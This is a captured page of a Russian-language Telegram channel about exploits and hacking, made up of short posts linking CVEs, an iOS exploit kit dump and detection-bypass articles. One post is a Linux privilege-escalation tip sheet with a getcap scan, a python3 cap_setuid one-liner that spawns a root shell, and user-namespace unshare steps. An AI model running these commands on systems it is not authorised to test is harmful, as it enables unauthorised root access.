TGViewer
Channel Public Channel
Proxy Bar

Proxy Bar

@proxy_bar

Exploits, Hacking and Leaks

Чат группы - https://t.me/

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Subscribers
21.5K
Photos
1.7K
Videos
107
Links
1.8K

Showing posts older than #3199 · Back to latest

Older Posts 20 shown
Post #3198 6.7K
What Windows Server 2025 Quietly Did to Your NTLM Relay

Game over.
  • 👍 11
  • 🔥 7
Post #3195 7.31K
Bypassing Detections with Command-Line Obfuscation
*
Read
  • 🔥 18
  • 👍 10
  • 😱 4
Post #3194 7.2K
unable to locate 😭
Вообще считаю что Отечественные ОС должны выдавать sudo через MAX
  • 👍 39
  • 😱 22
  • 🔥 13
Post #3193 7.41K
Внутри Coruna: реверс-инжиниринг государственного набора эксплойтов для iOS from JavaScript
*
Research
*
DownLoad Coruna DUMP
  • 🔥 16
  • 😱 9
Post #3192 7.78K
Рубрика На заметку $USERNAME@hacker.wtf - part 8
*

*
Linux давно ушёл от модели root / non-root. Все равны, но кто то р@вн33 ) Появились Capabilities !
Отдельные привилегии , дающие значок шерифа (например меняя UID).

Проверка capabilities:
getcap -r / 2>/dev/null
# и если например:
/usr/bin/python3 = cap_setuid+ep
# то бинарь может менять UID, значит сразу можно забрать root shell
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

опасные capabilities:
CAP_SYS_PTRACE # читать память процессов
CAP_SYS_ADMIN # почти root
CAP_DAC_OVERRIDE # игнорить права файлов
CAP_NET_ADMIN # рулить сетью
CAP_SETUID # менять UID

Кстати иногда админы отдают capability вместо SUID, это ниразу не секурнее, это ТОТ ЖЕ PrivEsc.
*
*

Namespaces Abuse
Вообще namespaces изолируют ресурсы: PID, NET, MNT, USER, UTS, IPC. И если словить мисконф или научиться солить, то можно в PrivEsc.
Namespacы дают получить root в изолированной среде и затем сразу же атаковать ядро.
#Чекаем, можно ли вообще трюкачить в user namespace
cat /proc/sys/kernel/unprivileged_userns_clone
1 = $USER может создать namespace

#cоздаём namespace (где -r root внутри namespace, -m новый mount namespace)
unshare -r -m bash
id
uid=0(root)

А уж внутри....... можно маунтить filesystem, юзать overlayfs, девайсы создавать. Во многих kernel privilege escalation присутствует.
То есть можно:
mkdir lower upper work merged

И смонтировать overlay = OverlayFS/FUSE/kernel permission bypass

Вообще NS поле не паханное, которое вываливается за горизонт событий, а если еще и misconf рядом есть, ну это ключи of kingdo0m

#РубрикаНаЗаметкуХакеру
  • 🔥 14
  • 👍 12
Post #3191 6.93K
Хорошо то как)))
ГиперТекстовыйТранспортныйПротоколБезопасный://ВсемирнаяПаутина.аладдин-рд.ру/помощь/загрузки/джакарта/джакартаюси-астра/энд/випнетХэВэТыща
  • 🔥 37
  • 👍 9
  • 😱 5
Post #3190 7.19K
UPD to https://t.me/proxy_bar/3185 CVE-2026-20127
*
В Cisco SD-WAN honeypot начали массово прилетать веб-шеллы.
Маховичок крутится.
  • 👍 13
Post #3188 7.54K
Cisco Secure Firewall Management Center Software Remote Code Execution Vulnerability
*
Read
  • 🔥 13
  • 👍 5
Post #3186 7.82K
Есть такой Coruna iOS Exploit Kit
*
А вот парочка восстановленных имплантов из этого Exploit Kit
  • 👍 16
  • 🔥 4
Post #3185 7.95K
CVE-2026-20127
*
Cisco-SD-WAN-Preauth-RCE

war
  • 👍 12
Post #3184 8.73K
Sexy/UNsexy software
руки на стол !!!
  • 🔥 41
  • 👍 7
Post #3182 7.96K
0_о
docker завезли .
Ну то есть теперь можно не через valgrind поднимать сотню " своих заряженных" контейнеров, а прям с докерХаба.
  • 🔥 25
  • 👍 5
Older posts →
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →